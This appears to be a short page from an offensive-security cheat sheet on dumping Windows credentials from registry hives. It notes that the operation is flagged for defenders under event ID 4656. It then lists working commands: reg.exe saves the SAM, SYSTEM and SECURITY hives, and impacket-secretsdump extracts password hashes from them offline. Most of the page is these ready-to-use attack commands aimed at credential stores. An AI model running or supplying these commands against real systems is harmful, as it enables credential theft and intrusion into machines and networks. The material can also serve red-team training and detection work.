REGISTRY

This is a FLAGGED OPERATION, dumping registry hives notifies Blue Teamers

EVENT IDs

4656 - Password hashes are dumped from the registry using tools such as as Mimikatz, Pysecdump, or Metasploit

We can dump secrets from the machine using REGISTRY HIVES

Saving SAM hive into the local machine

reg.exe save HKLM\SAM <PATH TO DUMP>

Saving SYSTEM hive into the local machine

reg.exe save HKLM\SYSTEM <PATH TO DUMP>

Saving SECURITY hive into the local machine

reg.exe save HKLM\SECURITY <PATH TO DUMP>

After dumping registry hives and transferring it into our local machine

impacket-secretsdump -SAM sam -SYSTEM system -SECURITY security LOCAL

PreviousVOLUME SHADOW COPYNextVAULT CREDENTIALS

Last updated